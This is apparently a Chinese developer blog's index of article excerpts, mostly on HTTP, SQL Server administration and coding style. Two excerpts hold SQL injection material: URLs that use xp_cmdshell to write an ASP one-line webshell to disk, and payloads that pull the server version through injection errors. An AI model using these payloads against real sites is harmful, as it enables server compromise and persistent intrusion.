摘要：凡搞WEB开发的人都离不开HTTP（超文本传输协议），而要了解HTTP，除了HTML本身以外，还有一部分不可忽视的就是HTTP消息头。 做过Socket编程的人都知道，当我们设计一个通信协议时，“消息头/消息体”的分割方式是很常用的，消息头告诉对方这个消息是干什么的，消息体告诉对方怎么干。HTTP传输的消息也是这样规定的，每一个HTTP包都分为HTTP头和HTTP体两部分，后者是可选的，而前者是必须的。每当我们打开一个网页，在上面点击右键，选择“查看源文件”，这时看到的HTML代码就是HTTP的消息体，那么消息头又在哪呢？IE浏览器不让我们看到这部分，但我们可以通过截取数据包等方法看到它。 下面就来看一个简单的例子： 阅读全文

摘要：[代码] 阅读全文

摘要： 什么是模板引擎？说白了就是能够自动替换占位符的替换引擎。原理上也就是两个步骤，找到-》替换。但是替换不是简单的替换，包括： 阅读全文

摘要： 如见Web2.0被吵的如火如荼，同时也有很多的评论褒贬不一。有人说Web2.0就是“一帮人在看皇帝的新装而已”。也有人说Web2.0将是一场变革。无论这些争论有没有价值，但我相信，存在就有它的必然性。也许Web2.0更像是一种商业模式，一个观念的变革而非技术。 阅读全文

摘要：前言： 即是高级技巧，其它基本的注入方法就不详述了。 看不懂可查本站的注入基础文章。 为了更好的用好注入，建议大家看看本站的SQL语法相关文章 阅读全文

摘要： 1. 打开新的窗口并传送参数：     传送参数：     response.write("")     接收参数：     string a = Request.QueryString("id");     string b = Request.QueryString("id1"); 阅读全文

摘要：一、命名 对于理解应用程序的逻辑流，命名方案是最有影响力的一种帮助。名称应该说明“什么”而不是“如何”。通过避免使用公开基础实现（它们会发生改变）的名称，可以保留简化复杂性的抽象层。例如，可以使用 GetNextStudent()，而不是 GetNextArrayElement()。 命名原则是： 选择正确名称时的困难可能表明需要进一步分析或定义项的目的。使名称足够长以便有一定的意义，并且足够短以避免冗长。唯一名称在编程上仅用于将各项区分开。表现力强的名称是为了帮助人们阅读；因此，提供人们可以理解的名称是有意义的。不过，请确保选择的名称符合适用语言的规则和标准。 以下几点是推荐的命名方法。 阅读全文

摘要：--1.给表中字段添加描述信息 CREATE table T2 (id int , name char (20)) GO EXEC sp_addextendedproperty 'MS_Description', 'Employee ID', 'user', dbo, 'table', T2, 'column', id EXEC sp_updateextendedproperty 'MS_Description', 'this is a test', 'user', dbo, 'table', T2, 'column', id --2.修改数据库名称 EXEC sp_renamedb 'old_db_name', 'new_db_name' --3.修改数据表名称和字段名称 EXEC sp_rename 'old_table_name', 'new_table_name'--修改数据表名称 EXEC sp_rename 'table_name.[old_column_name]', 'new_column_name', 'COLUMN'--修改 阅读全文

摘要：QUOTE: 1、 用^转义字符来写ASP(一句话木马)文件的方法:  http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^ c:\mu.asp';--  echo ^ c:\mu.asp 2、 显示SQL系统版本：  http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)  http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)-- 阅读全文

摘要：在A服务器中有表 table1 ，想把该表的内容导到 B服务器中，这两个数据库没联网，怎么办？ 导成外部文件，再用导入导出。。。。 这太笨了吧，如果对方服务器是INTERNET上的，只能执行服本怎么办，晕死了吧，用这个存储过程来帮你。 阅读全文

摘要：-- ====================================================== --列出SQL SERVER 所有表，字段名，主键，类型，长度，小数位数等信息 --在查询分析器里运行即可,可以生成一个表，导出到EXCEL中 -- ====================================================== SELECT (case when a.colorder=1 then d.name else '' end)表名, a.colorder 字段序号, a.name 字段名, (case when COLUMNPROPERTY( a.id,a.name,'IsIdentity')=1 then '√'else '' end) 标识, (case when (SELECT count(*) FROM sysobjects WHERE (name in 阅读全文

摘要：1. ORACLE SELECT * FROM TABLE1 WHERE ROWNUM=N 2. INFORMIX SELECT FIRST N * FROM TABLE1 3. DB2 SELECT * ROW_NUMBER() OVER(ORDER BY COL1 DESC) AS ROWNUM WHERE ROWNUM=N 或者 SELECT COLUMN FROM TABLE FETCH FIRST N ROWS ONLY 4. SQL SERVER SELECT TOP N * FROM TABLE1 5. SYBASE SET ROWCOUNT N GO SELECT * FROM TABLE1 阅读全文

摘要：EXECUTE sp_makewebtask @outputfile = 'D:"alcatel"20030902"check.htm', @query = 'SELECT * FROM Eiems_temporarydata..property', @templatefile = 'D:"alcatel"20030902"check.TPL',------check.tpl文件为模板文件 @dbname = 'Eiems_temporarydata', @rowcnt = 0, @whentype = 9 ,@lastupdated = 1 GO ******************************check.TPL******************************* 阅读全文

摘要：看了Heroman的一篇文章，谈论该不该在项目中使用存储过程代替SQL语句。看后有一些感想，因为最近工作接触到一个系统，业务过程几乎完全是用存储过程实现的。随着系统的不断发展，新的需求逐渐难以支持。这个原因当然很复杂，即使不使用存储过程，可能也有同样的问题。但是既然谈到具体技术上，就来看一下一个主要以存储过程实现的系统到底有哪些问题。 存储过程和嵌入程序中的SQL哪个更好，要用一种合理的比较方式来比，不能拿写的好的存储过程和写的烂的程序比，当然也不能拿写的烂的存储过程和写的好的程序比。我们先假设开发人员具有同样水平，项目组具有同样的组织协调能力，他们写出的存储过程和代码具有同样的质量，都已经根据产品的具体情况做出了最优的选择。 阅读全文

摘要：SQL五个集合函数：SUM,AVG,COUNT,MAX,MIN 　通配符的一些用法：(关键字：like % [] -) 　　select * from tablename where column1 like '[A-M]%' 　　这样可以选择出column字段中首字母在A-M之间的记录 　　select * from tablename where column1 like '[ABC]%' 　　这样可以选择出column字段中首字母是A或者B或者C的记录 　　select * from tablename where column1 like '[A-CG]%' 　　这样可以选择出column字段中首字母在A-C之间的或者是G的记录 　　select * from tablename where column1 like '[^C]%' 　　这样可以选择出column字段中首字母不是C的记录 阅读全文